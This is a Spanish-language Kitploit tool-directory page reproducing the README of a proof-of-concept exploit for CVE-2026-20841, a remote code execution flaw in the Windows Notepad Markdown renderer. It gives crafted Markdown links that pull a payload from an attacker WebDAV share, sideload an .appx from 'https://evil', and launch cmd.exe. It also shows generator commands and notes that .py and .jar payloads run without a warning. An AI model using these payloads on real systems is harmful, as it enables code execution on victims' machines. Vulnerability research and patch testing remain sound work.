Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-20841 — Prueba de concepto de exploit para CVE-2026-20841, una RCE en el Bloc de notas de Windows mediante enlaces de Markdown. Genera archivos .md manipulados para activar cargas útiles remotas, sideloading de aplicaciones o ejecución de binarios locales. | Kitploit
Herramientas/GitHubGitHub/atiilla/cve-2026-20841
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubatiilla/cve-2026-20841

CVE-2026-20841

Prueba de concepto de exploit para CVE-2026-20841, una RCE en el Bloc de notas de Windows mediante enlaces de Markdown. Genera archivos .md manipulados para activar cargas útiles remotas, sideloading de aplicaciones o ejecución de binarios locales.

Ver Repositorio
54hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-20841 - RCE en el Bloc de Notas de Windows

PoC para una falla de ejecución remota de código en el renderizador de markdown del Bloc de Notas de Windows. El motor de markdown no restringe los protocolos de URL, lo que permite activar manejadores de protocolo arbitrarios mediante enlaces clicables.

Avisos legales

  1. No es mi descubrimiento. El crédito corresponde a los investigadores originales en el aviso de MSRC. Esto es una recreación del PoC.
  2. Gravedad menor de lo que parece. Requiere más de un clic en la mayoría de los casos (ver Limitaciones). Lo construí porque "RCE en el Bloc de Notas" es demasiado divertido como para dejarlo pasar.

Vectores de ataque

1. Carga útil remota (file:///)

root@kitploit:~
[click](file:///\\attacker@5005\DavWWWRoot\payload.py)

El protocolo file:/// resuelve rutas UNC remotas. Vincula una carga útil y Windows la buscará y ejecutará al hacer clic.

2. Carga lateral de aplicaciones (ms-appinstaller://)

root@kitploit:~
[click](ms-appinstaller://?source=https://evil/xxx.appx)

Abre el Instalador de aplicaciones con un paquete .appx/.msix proporcionado por el atacante.

3. Ejecución de binarios locales (file://)

root@kitploit:~
[click](file://C:/windows/system32/cmd.exe)

Lanza cualquier ejecutable ya presente en el disco: cmd.exe, powershell.exe, mshta.exe, etc.

Uso

Ambos scripts generan un poc.md con un enlace manipulado en el directorio actual.

root@kitploit:~
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
root@kitploit:~
# ejemplo
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md

Cargas útiles de prueba en payloads/.

Limitaciones

  1. Las extensiones peligrosas siguen siendo marcadas. .exe, .lnk, .vbs y similares activan una advertencia de seguridad de Windows independientemente del comportamiento del Bloc de Notas.
  2. Las extensiones de intérprete evitan la advertencia. .py y .jar se ejecutan silenciosamente si Python o Java están instalados en el objetivo.

Notas

  • Las versiones vulnerables del Bloc de Notas están en Uptodown. Verifica la firma digital antes de usarlas.
  • Prueba solo en una máquina virtual.

¡Mantente a salvo!

Descargar herramienta